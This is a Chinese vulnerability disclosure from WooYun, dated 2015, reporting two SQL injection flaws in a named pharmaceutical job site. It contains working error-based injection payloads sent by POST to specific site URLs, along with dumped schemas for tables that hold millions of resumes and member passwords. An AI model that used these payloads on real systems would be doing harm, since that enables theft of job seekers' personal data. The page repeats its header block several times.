某医药人才网两处处漏洞打包泄露400W+简历(包括姓名/邮箱/手机/工作地址等)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144249

漏洞标题：某医药人才网两处处漏洞打包泄露400W+简历(包括姓名/邮箱/手机/工作地址等)

漏洞作者： ksss

提交时间：2015-09-30 15:33

修复时间：2015-11-14 15:34

公开时间：2015-11-14 15:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-30：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-11-14：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

400多万条身份信息呢

详细说明：

http://www.jobuy.com/

网站对参数过滤不是非常严格，产生了两处注入，泄露网站439万分简历，包括各种身份详情、职业经历和意向，50万会员账户信息，可登陆。
第一处
参数type，报错开的比较高，可以直接把值爆出来

http://www.jobuy.com/getjob.ashx
POST:count=14&type=LtaKxrcp' and convert(int,(db_name()))=1 and '1'='1

同时暴露了网站的物理路径
第二处

http://www.jobuy.com/net/company/resumelist.aspx?State=4
POST:
Button_DonwLoad=%e6%89%93%e5%8c%85%e5%af%bc%e5%87%ba%e7%ad%9b%e9%80%89%e7%bb%93%e6%9e%9c&Button_DonwPage=%e5%af%bc%e5%87%ba%e9%80%89%e4%b8%ad%e7%ae%80%e5%8e%86&Button_ToFilter=%e5%bc%80%e5%a7%8b%e7%ad%9b%e9%80%89&CascadingDropDown_City_ClientState=Eu2AfYFp' and 1=(user_name()) and '1'='1&CascadingDropDown_ForWorkPlace_ClientState=&CascadingDropDown_Province_ClientState=&checkall=on&DropDownList_AgeRange=999&DropDownList_City=San%20Francisco&DropDownList_Degree=-1&DropDownList_DeliverDate=9999&DropDownList_Experience=999&DropDownList_Graduating=999&DropDownList_JobList=0&DropDownList_KeyWordType=2&DropDownList_MoveTo=-1&DropDownList_Province=%e5%8c%97%e4%ba%ac&DropDownList_SectionList=0&DropDownList_Sex=999&DropDownList_Star=0&DropDownList_State=-1&DropDownList_WorkPlace=%e5%8c%97%e4%ba%ac&HiddenField_Date=20150928155105&TextBox_KeyWord=1&__EVENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTAyNzE5NzgyNA9kFgICBQ9kFhYCBQ9kFgICAQ8PFgIeBFRleHQFNTxzcGFuIGNsYXNzPSJvcmFuZ2UiPlvor5XnlKjotKblj7ddPC9zcGFuPmFicXZlZXNvLS0xZGQCCQ9kFgJmD2QWAgIBDxBkEBUBBuS4jemZkBUBATAUKwMBZxYBZmQCDQ8QZA8WAmYCARYCEAUG5LiN6ZmQBQEwZxAFCGFicXZlZXNvBQUzOTE3NGcWAWZkAhEPEA8WBh4NRGF0YVRleHRGaWVsZAUIUHJvdmluY2UeDkRhdGFWYWx1ZUZpZWxkBQhQcm92aW5jZR4LXyFEYXRhQm91bmRnZBAVJAbljJfkuqwG5aSp5rSlBuS4iua1twbph43luoYG5rKz5YyXBuWxseilvwblj7Dmub4G6L695a6BBuWQieaelwnpu5HpvpnmsZ8G5rGf6IuPBua1meaxnwblronlvr0G56aP5bu6Buaxn%2bilvwblsbHkuJwG5rKz5Y2XBua5luWMlwbmuZbljZcG5bm/5LicBueUmOiCgwblm5vlt50G6LS15beeBua1t%2bWNlwbkupHljZcG6Z2S5rW3BumZleilvwblub/opb8G6KW/6JePBuWugeWkjwbmlrDnloYJ5YaF6JKZ5Y%2bkBua%2bs%2bmXqAbpppnmuK8G5Zu95aSWBuS4jemZkBUkBuWMl%2bS6rAblpKnmtKUG5LiK5rW3BumHjeW6hgbmsrPljJcG5bGx6KW/BuWPsOa5vgbovr3lroEG5ZCJ5p6XCem7kem%2bmeaxnwbmsZ/oi48G5rWZ5rGfBuWuieW%2bvQbnpo/lu7oG5rGf6KW/BuWxseS4nAbmsrPljZcG5rmW5YyXBua5luWNlwblub/kuJwG55SY6IKDBuWbm%2bW3nQbotLXlt54G5rW35Y2XBuS6keWNlwbpnZLmtbcG6ZmV6KW/BuW5v%2bilvwbopb/ol48G5a6B5aSPBuaWsOeWhgnlhoXokpnlj6QG5r6z6ZeoBummmea4rwblm73lpJYAFCsDJGdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAhUPEA8WBh8BBQhQcm92aW5jZR8CBQhQcm92aW5jZR8DZ2QQFSQG5YyX5LqsBuWkqea0pQbkuIrmtbcG6YeN5bqGBuays%2bWMlwblsbHopb8G5Y%2bw5rm%2bBui%2bveWugQblkInmnpcJ6buR6b6Z5rGfBuaxn%2biLjwbmtZnmsZ8G5a6J5b69Buemj%2bW7ugbmsZ/opb8G5bGx5LicBuays%2bWNlwbmuZbljJcG5rmW5Y2XBuW5v%2bS4nAbnlJjogoMG5Zub5bedBui0teW3ngbmtbfljZcG5LqR5Y2XBumdkua1twbpmZXopb8G5bm/6KW/Builv%2biXjwblroHlpI8G5paw55aGCeWGheiSmeWPpAbmvrPpl6gG6aaZ5rivBuWbveWklgbkuI3pmZAVJAbljJfkuqwG5aSp5rSlBuS4iua1twbph43luoYG5rKz5YyXBuWxseilvwblj7Dmub4G6L695a6BBuWQieaelwnpu5HpvpnmsZ8G5rGf6IuPBua1meaxnwblronlvr0G56aP5bu6Buaxn%2bilvwblsbHkuJwG5rKz5Y2XBua5luWMlwbmuZbljZcG5bm/5LicBueUmOiCgwblm5vlt50G6LS15beeBua1t%2bWNlwbkupHljZcG6Z2S5rW3BumZleilvwblub/opb8G6KW/6JePBuWugeWkjwbmlrDnloYJ5YaF6JKZ5Y%2bkBua%2bs%2bmXqAbpppnmuK8G5Zu95aSWABQrAyRnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIXDxBkEBUBABUBABQrAwFnZGQCKQ8PZBYCHglvbmtleWRvd24FYmlmKGV2ZW50LmtleUNvZGU9PTEzKSB7ZG9jdW1lbnQuYWxsLkJ1dHRvbl9Ub0ZpbHRlci5mb2N1cygpO2RvY3VtZW50LmFsbC5CdXR0b25fVG9GaWx0ZXIuY2xpY2soKTt9ZAIxD2QWAmYPZBYCAgEPFgIeB1Zpc2libGVoZAIzD2QWAmYPZBYCAgMPEGQQFQYY56e75Yqo6YCJ5Lit566A5Y6G5YiwLi4uDOaWsOaUtueugOWOhgzlt7LpmIXnroDljoYP566A5Y6G5pS26JeP5aS5D%2bW3suS4i%2bi9veeugOWOhg/nroDljoblm57mlLbnq5kVBgItMQEwATEBMgE0ATMUKwMGZ2dnZ2dnFgFmZAI3D2QWAmYPZBYCAgkPDxYCHwVoZGQCOw9kFgJmD2QWAgIBDzwrAA0BAA8WBB8DZx4LXyFJdGVtQ291bnRmZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGNoZWNrYWxsBRNHcmlkVmlld19SZXN1bWVMaXN0DzwrAAoCBhUBCVJlY2VpdmVJRAhmZK9xl54cmI4ma4WbUKzsKg94gBSr&__VIEWSTATEGENERATOR=C1E81B99

当前库430W份求职简历

Database: jobuy_zhaopin
Table: IJOB_ApplyResume
[25 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| Age        | int      |
| City       | nvarchar |
| ComID      | char     |
| Degree     | int      |
| DTime      | datetime |
| Email      | nvarchar |
| Experience | int      |
| Graduating | bit      |
| ID         | int      |
| ip         | nvarchar |
| JobID      | int      |
| lv         | int      |
| Memo       | nvarchar |
| Name       | nvarchar |
| Province   | nvarchar |
| ResumeID   | char     |
| SectionID  | int      |
| Sex        | bit      |
| Star       | int      |
| State      | int      |
| Subject    | nvarchar |
| Tel        | nvarchar |
| Title      | nvarchar |
| WorkPlace  | nvarchar |
| ydtime     | datetime |
+------------+----------+

取一条，信息包括姓名、邮箱、手机号、工作地点、专业等等

50万条会员信息，包括邮箱、QQ号、账号密码、相片等等

Database: jobuy_zhaopin
Table: IJOB_Person
[82 columns]
+------------------------+----------+
| Column                 | Type     |
+------------------------+----------+
| Administrator          | bit      |
| Age                    | tinyint  |
| AvailNotice            | nvarchar |
| AvailOpts              | tinyint  |
| BanCom                 | nvarchar |
| Birthday               | tinyint  |
| Birthmonth             | tinyint  |
| Birthyear              | smallint |
| CensusRegisterCity     | nvarchar |
| CensusRegisterProvince | char     |
| City                   | nvarchar |
| complete               | int      |
| Computer               | tinyint  |
| ComputerLV             | nvarchar |
| Degree                 | tinyint  |
| DevelopingDirection    | ntext    |
| dianaLevel             | tinyint  |
| Education              | ntext    |
| Email                  | nvarchar |
| English                | tinyint  |
| EnglishLV              | nvarchar |
| Experience             | tinyint  |
| Graduating             | bit      |
| Height                 | smallint |
| HitCount               | int      |
| HomePage               | nvarchar |
| ID                     | int      |
| IP                     | nvarchar |
| IsMobile               | bit      |
| jingyanshuoming        | ntext    |
| jinyan                 | int      |
| JobClass               | nvarchar |
| JobIntension1          | nvarchar |
| JobIntension2          | nvarchar |
| JobIntension3          | nvarchar |
| l_OneAbility           | tinyint  |
| l_twoAbility           | tinyint  |
| language_two           | tinyint  |
| LastLogin              | datetime |
| llcs                   | int      |
| LoginCount             | int      |
| lxbm                   | bit      |
| mandarinLevel          | tinyint  |
| MaritalStatus          | tinyint  |
| mbsys                  | tinyint  |
| Name                   | char     |
| Nationality            | char     |
| Negotiable             | tinyint  |
| otherLanguage          | varchar  |
| PassWord               | nvarchar |
| Pay                    | int      |
| Photo                  | char     |
| photopb                | tinyint  |
| phototre               | tinyint  |
| ProvideHouseNeeded     | tinyint  |
| Province               | char     |
| QQ                     | varchar  |
| RegDate                | datetime |
| ResumeID               | char     |
| ResumeLevel            | int      |
| rjobid                 | varchar  |
| School                 | nvarchar |
| Secret                 | bit      |
| SelfAssessment         | ntext    |
| Sex                    | bit      |
| SiteName               | varchar  |
| Skill                  | ntext    |
| Subject                | nvarchar |
| Tel                    | nvarchar |
| UpdateDate             | datetime |
| UserName               | nvarchar |
| workdata               | smallint |
| WorkEXPCache           | ntext    |
| WorkPlace1             | char     |
| WorkPlace2             | char     |
| WorkPlace3             | char     |
| zazhi                  | bit      |
| zhengshu1              | char     |
| zhengshu2              | char     |
| zhengshu3              | char     |
| zhengshu4              | char     |
| zhengshutre            | tinyint  |
+------------------------+----------+

管理员的账号证明

漏洞证明：

修复方案：

参数过滤

版权声明：转载请注明来源 ksss@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：18 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144249

漏洞标题：某医药人才网两处处漏洞打包泄露400W+简历(包括姓名/邮箱/手机/工作地址等)

相关厂商：猎才医药网

漏洞作者： ksss

提交时间：2015-09-30 15:33

修复时间：2015-11-14 15:34

公开时间：2015-11-14 15:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ksss@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144249

漏洞标题：某医药人才网两处处漏洞打包泄露400W+简历(包括姓名/邮箱/手机/工作地址等)

相关厂商：猎才医药网

漏洞作者： ksss

提交时间：2015-09-30 15:33

修复时间：2015-11-14 15:34

公开时间：2015-11-14 15:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0144249"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ksss@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：